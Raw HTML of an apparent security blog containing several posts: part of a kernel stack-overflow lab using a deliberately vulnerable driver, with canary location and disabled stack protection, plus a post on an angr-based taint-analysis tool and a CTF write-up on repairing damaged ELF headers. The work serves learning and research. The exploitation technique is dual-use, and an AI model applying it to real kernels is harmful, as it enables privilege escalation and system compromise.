href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQGHWYmt2OJZucvQEZYypi0y6keMUI93jfKHD-XTaaf6VqTqfl_3WG0cSLdXhKh-WRmFbKrjhsOwFWSxwSp93dWotaJoMiSFL9Z21IHiwcCMcSGfHiQE22DBkY36F_9vCnjWvXN_WEhAY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="710" data-original-width="886" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQGHWYmt2OJZucvQEZYypi0y6keMUI93jfKHD-XTaaf6VqTqfl_3WG0cSLdXhKh-WRmFbKrjhsOwFWSxwSp93dWotaJoMiSFL9Z21IHiwcCMcSGfHiQE22DBkY36F_9vCnjWvXN_WEhAY/s16000/Screenshot+from+2020-11-27+01-38-13.png" /></a></div> <br /><p></p><p><i>*note the stack dump at the end, clearly we're hitting the right memory here. </i></p><p>Which results in the following kernel panic: </p><p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiuJ_QVhPqLD4VyTkAjJrNeneWAwwtjCDi5vv4iQj4yTuEHbChI-eR5McGoqeIYCF5cwyJqkMvcm99DiMDeszWfYXN8AEuHvdPihpuBReqDi0iW_UDdIRxC9n9Y0mL9v_fMXJrPa_feb8/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="59" data-original-width="1759" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiuJ_QVhPqLD4VyTkAjJrNeneWAwwtjCDi5vv4iQj4yTuEHbChI-eR5McGoqeIYCF5cwyJqkMvcm99DiMDeszWfYXN8AEuHvdPihpuBReqDi0iW_UDdIRxC9n9Y0mL9v_fMXJrPa_feb8/s16000/stack_corrupted2020-11-27+01-39-35.png" /></a></div></div><p></p>We're on the right track! A little worrying here, the kernel is saying stuff about "Kernel stack is corrupted", which means we are overwriting the kernel stack canary value--<i>I mentioned in the section on memory protections</i>. There are two approaches we can take here, 1) <i>get rid of the canary</i>: We can cheat and contrive an example with no such memory protections and explore how easy it is to exploit or 2) <i>leak the canary</i>: We do another sort of cheating and add a flaw to our driver that leaks the canary value.<i> </i>We're gonna do both! </div><div><br /></div><div>Lets make sure we know where the stack canary is though, I've shown a couple examples here---<i>these are taken from the break point just after the <span style="font-family: courier;">memcpy</span> is hit but I believe any breakpoint in the function should work</i>:</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBPitCV6UtZREVatchFZrJi852iKEgEuvrZ1kzWxUdP5gfogALp9n91SpwzNDNfoOPOoktq2crI7ajt2Y3qdZvo5a1yOl0ZBzTNGZQurE_6BNdzFOZZppYarCizAD9bNJXkarsZFOSjP8/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="168" data-original-width="734" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBPitCV6UtZREVatchFZrJi852iKEgEuvrZ1kzWxUdP5gfogALp9n91SpwzNDNfoOPOoktq2crI7ajt2Y3qdZvo5a1yOl0ZBzTNGZQurE_6BNdzFOZZppYarCizAD9bNJXkarsZFOSjP8/s16000/canary_example_1-2020-11-27+15-55-10.png" /></a></div><br /></div><div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiToVGQOCG3b1cftcg5G-plF1-0LTQ86GGPDfho-oNoGACkOQCRW7PIgsGkvo4WeDaZq2vhMOJ7ngQ2ajZYTb-VXaZPY0lWOupTGd6lQQCcL7pt0LBdnDuzUtY6dYgLrBpir95wnoZhCp4/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="139" data-original-width="731" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiToVGQOCG3b1cftcg5G-plF1-0LTQ86GGPDfho-oNoGACkOQCRW7PIgsGkvo4WeDaZq2vhMOJ7ngQ2ajZYTb-VXaZPY0lWOupTGd6lQQCcL7pt0LBdnDuzUtY6dYgLrBpir95wnoZhCp4/s16000/canary_example_2-2020-11-27+15-55-41.png" /></a></div><br /></div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUVmhtP8xqH3d1sgj9yAn3JpAvebenRWLKZHT_ocYuZr1slACRa9TG-11oW5Yrq3BgA0SpI_1pMfIgwMlL2uH8nmLVaB_Fh1H3HFvhzz-BlD2eGCL6i9MyM2DzXmOThOM4HedXidPbPas/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="138" data-original-width="732" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUVmhtP8xqH3d1sgj9yAn3JpAvebenRWLKZHT_ocYuZr1slACRa9TG-11oW5Yrq3BgA0SpI_1pMfIgwMlL2uH8nmLVaB_Fh1H3HFvhzz-BlD2eGCL6i9MyM2DzXmOThOM4HedXidPbPas/s16000/canary_example_3-2020-11-27+15-56-12.png" /></a></div><br /><br /></div><div><br /></div><div>And to boot, we can make 100% sure that we are actually looking at a stack canary value by looking for the following markers:</div><div><ul style="text-align: left;"><li>Usually they are tucked into the stack just before all the other stack frames from previous functions are shown.</li><li>Stack canaries almost always occupy a full register size with random looking bytes---this means comparing that position to different runs of the function.</li></ul><p>And lastly, when you overwrite them with even one single byte, the kernel gets panicky talking about stack-protector stuff again: <br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih0bzN8n7FUQ8gVRlWcUdOpWpYv6ibFk8eqiTlgrTg7Sz0JwcaIs21Ccf0XIcg6-ANnuBiDCyVwwaanI1uDgnTZR-PS6cnnjB_Zd_Yqo81s8ZGgFLAuR0tja5QxGYvC69hGn-n87UeEGQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="843" data-original-width="983" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih0bzN8n7FUQ8gVRlWcUdOpWpYv6ibFk8eqiTlgrTg7Sz0JwcaIs21Ccf0XIcg6-ANnuBiDCyVwwaanI1uDgnTZR-PS6cnnjB_Zd_Yqo81s8ZGgFLAuR0tja5QxGYvC69hGn-n87UeEGQ/s16000/Canary_Found-2020-11-27+14-58-46.png" /></a></div> <p></p><p>In the above screenshot we can see two separate runs of the <span style="font-family: courier;">stacksmash_driver</span>, the first one writes 16 bytes the second 17, note the difference in the behavior and stack layout. At offset <span style="font-family: courier;">0xffffc90000015fea8</span> we can see the stack cookie overwritten by a single <span style="font-family: courier;">0x41</span>.</p><p>Cool we now are well versed at setting breakpoints, finding the stack canary and disassembling the binary so I will try to keep the screenshots a little simple from here on out while showing as much as is needed to make my point. The next step is to explore our options in terms of memory protection now that we can control our payload well and navigate memory structures to some extent. <br /></p></div><div><h2 style="text-align: left;">No Canaries, No Cares </h2></div><div>The first thing I'd like to experiment with is no stack protector options for the kernel at all, we can turn them off my issuing the following commands and re-making the kernel:</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqawl1LZkYyJwKu3OSK4WNqjR7DsFxDDTzYQ8MLZwtcami97tPZMcIorMFNuR1S7EkFxzFNRLqNroQox9e5-XlobiQvmZK9t6U4uz_pNrhjBHs1MoWdfHzZ4rL3Bu5fM4IXs0tShQvXc4/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="574" data-original-width="644" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqawl1LZkYyJwKu3OSK4WNqjR7DsFxDDTzYQ8MLZwtcami97tPZMcIorMFNuR1S7EkFxzFNRLqNroQox9e5-XlobiQvmZK9t6U4uz_pNrhjBHs1MoWdfHzZ4rL3Bu5fM4IXs0tShQvXc4/s16000/remove_stackprotector.png" /></a></div><br /><br /></div><div><br /></div><div><i>You'll notice that some options don't get turned off, just ignore them for now; there is a way to force them off but it involves scratching around with the Kconfig default values which can turn into a mess really quickly so I'm not going to advise that. Btw this build will take a while as well, obviously because it affects literally everything that runs in the kernel and requires recompiling everything!<br /></i></div><div><br /></div><div>Here's the behavior of the stack overflow when I write 17 bytes without <span style="font-family: courier;">CONFIG_STACKPROTECTOR</span> and <span style="font-family: courier;">CONFIG_STACKPROTECTOR_STRONG</span>:</div><div> </div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUbFznjY_hgFVgK254b-9Wj1YnkQdkK2UsugbwsWeNBQLmCObR1UD-GHUHFPV8HAUeSNKAhuYqVJMrv8Lb7GXvafwaNLy_IR6_lX1QhgOeuUtajSgEHhZkCQ9JW7gm7HJiIjfUTSfqOk/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="303" data-original-width="738" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEUbFznjY_hgFVgK254b-9Wj1YnkQdkK2UsugbwsWeNBQLmCObR1UD-GHUHFPV8HAUeSNKAhuYqVJMrv8Lb7GXvafwaNLy_IR6_lX1QhgOeuUtajSgEHhZkCQ9JW7gm7HJiIjfUTSfqOk/s16000/no_stack_protector-2020-11-27+16-28-48.png" /></a></div><br /><br /></div><div>See no weird 64bit values that look all strange and random, also when we check the function exit prologues we don't see any compares or checks against the canary. </div><div> </div><div>The next thing we need to do is try to corrupt some return pointers but that requires I actually know a little more about what I'm doing here so I'm gonna need a little break to git guud. Please watch this space for the next post. </div><div> </div><div>Thanks for reading!<br /></div><div> </div><div><h2 style="text-align: left;">Reading and References</h2><ol style="text-align: left;"><li><a href="https://census-labs.com/media/bheu-2011-slides.pdf">https://census-labs.com/media/bheu-2011-slides.pdf</a></li><li><a href="https://papers.put.as/papers/macosx/2011/PROTECTING-THE-CORE-KERNEL-EXPLOITATION-MITIGATIONS-bheu-2011-wp.pdf">https://papers.put.as/papers/macosx/2011/PROTECTING-THE-CORE-KERNEL-EXPLOITATION-MITIGATIONS-bheu-2011-wp.pdf</a> <br /></li><li><a href="https://www.kernel.org/doc/html/latest/security/self-protection.html">https://www.kernel.org/doc/html/latest/security/self-protection.html</a> </li><li><a href="https://www.kernel.org/doc/Documentation/security/self-protection.txt">https://www.kernel.org/doc/Documentation/security/self-protection.txt</a> </li><li><a href="https://yoursunny.com/t/2018/one-kernel-module/">https://yoursunny.com/t/2018/one-kernel-module/</a> </li><li><a href="https://cs.stackexchange.com/questions/45159/can-someone-explain-this-diagram-about-slab-allocation">https://cs.stackexchange.com/questions/45159/can-someone-explain-this-diagram-about-slab-allocation</a></li><li><a href="https://blog.infosectcbr.com.au/2020/02/linux-kernel-stack-smashing.html">https://blog.infosectcbr.com.au/2020/02/linux-kernel-stack-smashing.html</a></li><li><a href="https://lwn.net/Articles/692208/">https://lwn.net/Articles/692208/</a> </li><li><a href="https://lwn.net/Articles/691631/">https://lwn.net/Articles/691631/</a></li><li><a href="https://lwn.net/Articles/725832/">https://lwn.net/Articles/725832/</a> </li><li><a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=320b2b8de12698082609ebbc1a17165727f4c893">https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=320b2b8de12698082609ebbc1a17165727f4c893</a> </li><li><a href="https://blog.qualys.com/vulnerabilities-research/2017/06/19/the-stack-clash">https://blog.qualys.com/vulnerabilities-research/2017/06/19/the-stack-clash</a> </li><li><a href="https://googleprojectzero.blogspot.com/2016/06/exploiting-recursion-in-linux-kernel_20.html">https://googleprojectzero.blogspot.com/2016/06/exploiting-recursion-in-linux-kernel_20.html</a> </li><li><a href="https://blog.aquasec.com/bugs-gone-wild-container-stack-clash-and-cve-2017-1000253">https://blog.aquasec.com/bugs-gone-wild-container-stack-clash-and-cve-2017-1000253</a> <br /></li></ol></div></div>Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-5120915008700940732020-11-12T15:47:00.001-08:002020-11-12T15:47:53.237-08:00SporeCrawler : Binary Taint Analysis with Angr <p>In this very brief post I'm going to share a tool I've build that does binary taint analysis using Angr. There really isn't much to talk about since the code is pretty readable and not complex but I will also walk though a quick introduction to the concept and why its cool. The post will include links to all the scripts used. I should mention that the tools used here are research tools they have bugs, they don't always run so smooth and there's a bunch of cases they can't manage; but they do give you access to a pretty nifty technology, symbolic execution and taint analysis!</p><h2 style="text-align: left;">What is Taint Analysis?<br /></h2><p>Taint analysis is a static analysis method computer scientists and other researchers use in order to track the flow of data in a program. Essentially one does taint analysis to see which points in the programs execution are influenced by user input. This is nifty because it helps prune down source code analysis to the most relevant sections of code. It also obviously helps guide fuzzing toward more fruitful areas of the code too! </p><p> The script we're going to develop here simply prints out any dangerous c functions, who's symbolic state is tainted by our input; this means either a register, memory value, file descriptor etc any part of the symbolic state at some point was dependent on our input. <br /></p><p>Taint analysis comes in two variants <b>static</b> which is based purely on code and definition analysis; and <b>dynamic</b> which relies on actual execution and instrumentation to collect information. Each approach has its own draw backs, for instance dynamic analysis or any analysis that works purely by collecting live execution data risks under approximating behavior---only being aware of common input path based behavior. The opposite effect is true for static methods, because they only work on source code--although requiring only source or static definitions--can often report more bugs or events than is practically possible. The work of some research is to prune and whittle down these results through various tricks and schemes, blend methods together.</p><p>To keep things to the point, in this post we will only focus on easy static taint analysis. The good thing, this taint analysis approach is pretty accurate, it just suffers from a couple draw backs that are sometimes manageable for real world binaries.The upside of this approach is first and foremost that its easy to implement and is relatively accurate. In future research I will hopefully provide some hacks to get Angr running a bit smoother for complex binaries.</p> <h2 style="text-align: left;">Claripy Annotations for Taint Analysis</h2><p>We're doing taint analysis by using claripy's Annotations. These are basically classes that you can use to tag symbolic vectors or AST elements. It turns out there's a special parameter included in the constructors of claripy.BVS objects that accepts an annotation class. For now we're going to just use a blank instances of the base Annotation class in claripy. </p><p>Here's how you setup a symbolic execution run in Angr with an annotated ARGV input:</p><p></p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi35JWs6daJshExnMlMOdALEeLyB-7MBH8zGsixBefOlz8FIHaCsSBH-MagX_rKJ9SSHK6dGT93yuEPQjw7H6j2jGPnHg1Q5ECC1ZPGUT0hnU6O9wHOWN3teVXKShS5LFa-l4OmX7Bqe3A/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="106" data-original-width="1223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi35JWs6daJshExnMlMOdALEeLyB-7MBH8zGsixBefOlz8FIHaCsSBH-MagX_rKJ9SSHK6dGT93yuEPQjw7H6j2jGPnHg1Q5ECC1ZPGUT0hnU6O9wHOWN3teVXKShS5LFa-l4OmX7Bqe3A/s16000/Screenshot+from+2020-11-13+00-24-24.png" /></a></div><br /><br /></div><p></p><p>And then in the hooks we simply check if there's an annotated register, bare in mind when it comes to certain calling conventions rsi, rdi and other registers often hold pointers to parameters, so checking them for annotation first makes sense:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_sxPQCcCCKUNNTy5AYaGbdw55JukkZ-vcEp_z_EnkOQy7IBYks5QMpPR4LB58isdNzoH7hSVfDprpesyj4ECEK9pwfI-HWmq4d9_ePK0JrGFajhp4IJn-cSPXKb6rihya9R2G-amntvY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="180" data-original-width="539" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_sxPQCcCCKUNNTy5AYaGbdw55JukkZ-vcEp_z_EnkOQy7IBYks5QMpPR4LB58isdNzoH7hSVfDprpesyj4ECEK9pwfI-HWmq4d9_ePK0JrGFajhp4IJn-cSPXKb6rihya9R2G-amntvY/s16000/Screenshot+from+2020-11-13+00-27-40.png" /></a></div><br /> <p></p><p>Now why would we want to use annotations? Well when AST binary operations and others involve operands that are annotated, the annotation will be transmitted to the destination operand. This means we can track the data flow of input if we set a start taint on a value we know we control. Angr will handle symbolic execution of the binary for us.The rest of the work is simply developing hooks for the functions we would like to intercept or report on, and making sure the hooks can inspect their symbolic states for annotations.</p><p>I've test SporeCrawler on real world binaries from my host machine as well as some simple litmus tests to make sure I'm not going crazy. Here's what a nice run of SporeCrawler looks like, gnuplot is the target binary here:</p><p> </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw6hl7libFukQqZebYtjPKLSCQga7o0DIeMmRNrXcL4XqK_VcrQwm4YPAciZ3LwF4MrMs_TFuHyLbrcNUOR83mlyXWmgqF_3aViap2aY-uGYOsnpDJZDWZ5Jc80rCjWY2hxwpsFhZelVs/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1016" data-original-width="1848" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw6hl7libFukQqZebYtjPKLSCQga7o0DIeMmRNrXcL4XqK_VcrQwm4YPAciZ3LwF4MrMs_TFuHyLbrcNUOR83mlyXWmgqF_3aViap2aY-uGYOsnpDJZDWZ5Jc80rCjWY2hxwpsFhZelVs/s16000/sporecrawler_testrun.gif" /></a></div><br /><br /><p></p><p>SporeCrawler has a couple options but it mostly serves to be a good example of implementing angr to do taint analysis, check out more about it here: <a href="https://gitlab.com/k3170makan/SporeCrawler.git">https://gitlab.com/k3170makan/SporeCrawler.git</a></p><p><br /></p><p><br /></p>Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com1tag:blogger.com,1999:blog-5845671313867906274.post-27294440864055193542020-11-11T17:59:00.008-08:002020-11-11T17:59:51.692-08:00[ELF Necromancy 0x0 ] Tricks for Resurrecting dead ELF files <div dir="ltr" style="text-align: left;" trbidi="on">
This post is going to cover some stuff I learned while suffering through some rando keygen style reverse engineering CTFs. Basically, what do you do</div><div dir="ltr" style="text-align: left;" trbidi="on">in order to patch up an ELF file if say, some of the header information is lost, and can you do this using hexdump and hexedit alone? If you want to know how this turned out, stay tuned! <br /></div><div dir="ltr" style="text-align: left;" trbidi="on"><br /></div><div dir="ltr" style="text-align: left;" trbidi="on">ELF files don't need all their bells and whistles in order to execute (<i>baring some code that self inspects for some stuff</i>). This means you don't actually need to specify all of the aspects of an ELF file in order to get it working, you can skip or provide false data for debug information and you don't even need working section header meta-data (we'll show an example later on). So naturally some CTF problems will exploit this as some cheap anti-debug because GDB will not accept this either. So how what are some things you can try to recover some information from an ELF file if someone's messed up the meta-data?</div><div dir="ltr" style="text-align: left;" trbidi="on"><br /></div><h2 style="text-align: left;">Recovering Section Meta-data</h2><div dir="ltr" style="text-align: left;" trbidi="on">Okay so we have an ELF executable called dead.elf and it runs but we cannot</div><div dir="ltr" style="text-align: left;" trbidi="on">debug it. The challenge is to fixup the binary so that gdb is nice to it.</div><div dir="ltr" style="text-align: left;" trbidi="on"><br /></div><div dir="ltr" style="text-align: left;" trbidi="on">Fixing up the binary will mean recovering section data and I won't introduce sections here. I've already done a post on these but I will mention some of the important parts to make understanding this post a bit easier. Sections are chunks of an ELF file that contain basically annotations (<i>labels and type information</i>) for other chunks of an ELF file. Your ELF files have a number of important sections holding special collections of code (<font face="courier">.init</font> and <font face="courier">.fini</font>), the symbol table the bss section and the data section and other good stuff. In order to organize all of this information a couple data structures and offset pointers are needed, namely:</div><div dir="ltr" style="text-align: left;" trbidi="on"><ul style="text-align: left;"><li>ELF header field <font face="courier">e_shentsize </font>- <i>showing the size of the section headers</i></li><li>ELF header field <font face="courier">e_shnum </font>- <i>showing the start of the section header table</i></li><li>ELF header field <font face="courier">e_shoff </font>-<i> showing the offset in the ELF file where the section headers begin.</i><br /></li><li>Section Header Table - <i>list of data fields for sections</i> (<i>offset, size, type, flags all that schpeel</i>)</li><li>Section String Table <font face="courier">.shstrtab </font>- <i>list of strings for labeling the sections in the Section Header Table.</i></li></ul><div>Okay so obviously spotting those things in the hex dump will provide you some clues on putting together this puzzle. </div><div> </div><div>To start off with, lets take a look at something very easy to spot in an ELF file, the Section String Table. Here's what the one for the <font face="courier">/bin/bash</font> ELF file looks like:</div><div> </div><div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioKszrIHcjLdsIiQG0KHLQyyQQSuYj6XezxDVnTsPupkj-opSPpfhz0RD2vwj-O8oC2PP75ScO2_fcWiGW5dGDu5DIwHXWjtkVgj2KUzTlgVbHxUWj5p9ehozF-jBQmA1GUQDPkodrsqw/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="345" data-original-width="708" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioKszrIHcjLdsIiQG0KHLQyyQQSuYj6XezxDVnTsPupkj-opSPpfhz0RD2vwj-O8oC2PP75ScO2_fcWiGW5dGDu5DIwHXWjtkVgj2KUzTlgVbHxUWj5p9ehozF-jBQmA1GUQDPkodrsqw/s16000/Screenshot+from+2020-11-11+23-07-40.png" /></a></div><br /></div><div>To confirm we are looking at the correct section of the file we can use readelf:</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij4yF9Q8DKAtQj9kbYaRZF4X9GKf3vi6Zdg-cMfsJkpL28rBqtdLdjAcuX5B5k_E6_oK8U3l94EBGuFbuSeQmPFKksLUPv-rCPKMuEtvPh6CB12BYRWLsSOBxqe47hv1r40WtbkaHuYRk/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="64" data-original-width="633" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij4yF9Q8DKAtQj9kbYaRZF4X9GKf3vi6Zdg-cMfsJkpL28rBqtdLdjAcuX5B5k_E6_oK8U3l94EBGuFbuSeQmPFKksLUPv-rCPKMuEtvPh6CB12BYRWLsSOBxqe47hv1r40WtbkaHuYRk/s16000/Screenshot+from+2020-11-11+23-07-30.png" /></a></div><br />That's freakishly close to the section we guessed above. Another huge clue that this is probably our section string table is obviously the prevalence of section names! Now, if you've found this, you know something else, you know how many sections there are---probably, well a really good guess! </div><div> </div><div>Here's the string table from our dead.elf binary:</div><div> </div><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV-awzSbUNKW1g_neeD2C7RcwQ9c4OYAlr-nCHkCexRSqFK-YmbUpiaCHj2IS02xGyaVYgWViHFHjm149wvnryMSRTUMyq11WYnxCfsaR-rAG3C0pPVjfvJe6PAaTNBgaD77BNFMHuiS0/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="164" data-original-width="860" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV-awzSbUNKW1g_neeD2C7RcwQ9c4OYAlr-nCHkCexRSqFK-YmbUpiaCHj2IS02xGyaVYgWViHFHjm149wvnryMSRTUMyq11WYnxCfsaR-rAG3C0pPVjfvJe6PAaTNBgaD77BNFMHuiS0/s16000/Screenshot+from+2020-11-11+23-42-06.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"> I counted 24 distinct section names so I'm going with that!<br /></td></tr></tbody></table><br /> <br /></div><div> </div><div>This information means you can immediately specify the <font face="courier">e_shnum</font>---<i>24 section names counted according to me</i>---which helps but we still have more arcane symbols to find, before our ELF lives again! Next we should try and find the beginning of the section header table, if we guess this right then readelf should be able to interpret our sections neatly. </div><div> </div><div>Now you may be super good at this and perhaps can just quickly find groups of bytes with your eye that match the format, but there are a couple of things I realized that could speed up the search:</div><div><ul style="text-align: left;"><li>The section header table entries have two very similar in value fields right after one another, namely: the <font face="courier">sh_addr </font>and <font face="courier">sh_offset</font>, these fields specify the virtual address of the section (<i>where it will appear in a memory</i>) and the offset of the section in the file, respectively. The reason this has such low entropy during manual inspection is because one number will usually be a predictable offset from the other or likely be the same number repeated! There's a common pattern of <span style="font-family: courier;">sh_offset</span> being at some <font face="courier">0xYYY </font>and the <font face="courier">sh_addr </font>then at <font face="courier">0xDYYY </font>where <font face="courier">0xD</font> is some some number between <font face="courier">0x1 </font>and <font face="courier">0xF</font>. This is actually pretty easy to spot in a hex dump.</li></ul><div><br /></div><ul style="text-align: left;"><li>For Linux based ELF files, there is a noticeable pattern to the type fields, you would only see numbers from a small range. Typically you'll also see some <font face="courier">SHT_NOTE</font> sections. Also if the binary is compiled with GNU GCC it may slap in a familiar byte pattern into the <font face="courier">sh_type </font>field for its own meta-data, namely the .gnu.version section and its cousins.</li></ul><div><span> </span><span> <table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfRcfcjPL0lU6L7T-WnCBOWvE7-SAl3EvD45kQefxe1qJHxknXPEHqvDxfjXtCvoPqVxxdmbWoKc5UF1PasHVR5zLvqoWa2B61_wihuAY4v4KWfM6bywmIxk0J_heMUTZopzRb435T78/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="76" data-original-width="704" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfRcfcjPL0lU6L7T-WnCBOWvE7-SAl3EvD45kQefxe1qJHxknXPEHqvDxfjXtCvoPqVxxdmbWoKc5UF1PasHVR5zLvqoWa2B61_wihuAY4v4KWfM6bywmIxk0J_heMUTZopzRb435T78/s16000/Screenshot+from+2020-11-11+23-28-38.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">example of the "familiar pattern" left in GCC compiled binaries, this is the <span style="font-family: courier;">GNU_HASH</span> section. try to remember this pattern of bytes for later on <span style="font-family: courier;">0xf6ffff6f</span><br /></td></tr></tbody></table><br /></span><br /></div><ul style="text-align: left;"><li>A good place to start the search is after the<font face="courier"> .shstrtab</font>, in my experience, at least for Ubuntu/GNU GCC ELFs the section header table is usually placed there (<i>this of course may vary by compiler and operating system</i>). In fact the offset usually configured as the start of the <span style="font-family: "courier";">e_shoff</span> is actually just the first byte after the <span style="font-family: "courier";">.shstrtab</span> ends, which is usually a field of nulls and then the actual section header table. </li></ul>The last point comes outta nowhere, I don't really have much justification in ths post for saying that so here are some samples showing that often the section header table offset is right after the section string table:</div><div><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijbcHT5PvK8y-7xRkdL1CXnd4sToro9i2Jqui8RBdVAiWpcPJdfUwMqB0RggRQKz8zzv7b-4aH0qKsshiuBbl59LpyBLeggo6QD4uIPcZoUAONFV4mRZoL6hQvve3a05vZAGn-tsXZGGw/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="39" data-original-width="612" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijbcHT5PvK8y-7xRkdL1CXnd4sToro9i2Jqui8RBdVAiWpcPJdfUwMqB0RggRQKz8zzv7b-4aH0qKsshiuBbl59LpyBLeggo6QD4uIPcZoUAONFV4mRZoL6hQvve3a05vZAGn-tsXZGGw/s16000/Screenshot+from+2020-11-11+23-21-51.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><br /></td></tr></tbody></table><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN-Pnemd5LL153supk242tsAgLtBe1PtgwhGs3ifYoxa9AEaPIjNbQGAte1C6b1vrJxbzWp57Pgmbkwmzqh9u7M5hxtC12I4njJ8UYHO2eRlT8rb_uxfCXaMGERDmwTZRHkksslzE8LW0/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="162" data-original-width="710" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN-Pnemd5LL153supk242tsAgLtBe1PtgwhGs3ifYoxa9AEaPIjNbQGAte1C6b1vrJxbzWp57Pgmbkwmzqh9u7M5hxtC12I4njJ8UYHO2eRlT8rb_uxfCXaMGERDmwTZRHkksslzE8LW0/s16000/Screenshot+from+2020-11-11+23-22-35.png" /></a></div><p></p><p>The screenshots above are for grep, please note the extract from readelf as before showing that the section string table begins at <span style="font-family: courier;">0x3013c</span>. In the dump we can see the end of the section string table and the beginning of the section header table, as confirmed by this screenshot:</p><p></p><p><span style="font-family: courier;">hex(197216) = 0x30260</span>, which is right were the .shtrtab ends for us! You're gonna hafta believe me that this is a common enough pattern., mostly because I'm not going to bloat my blog post with lots repetitive examples.</p><p>So lets try using these tricks on a real binary, and work it from being a undebuggable defiled corpse to a living breathing totally under our control.<br /><br /></p><div><h2 style="text-align: left;">ELF Necromancy in Practice </h2></div><div><br /></div></div><div>As mentioned before the binary doesn't respond well to gdb, when trying to open it in gdb we get this annoying message:</div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;">>$ gdb ./dead.elf </span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"> ...</span></div><div><span style="font-family: courier;">Type "apropos word" to search for commands related to "word"...<br />"/home/kh3m/Research/CTF/elf_necromancy/misc/./dead.elf": not in executable format: file truncated<br /> </span></div><div><br /></div><div>Checking this out with readelf:</div><div> </div><div class="separator" style="clear: both; text-align: center;"><a 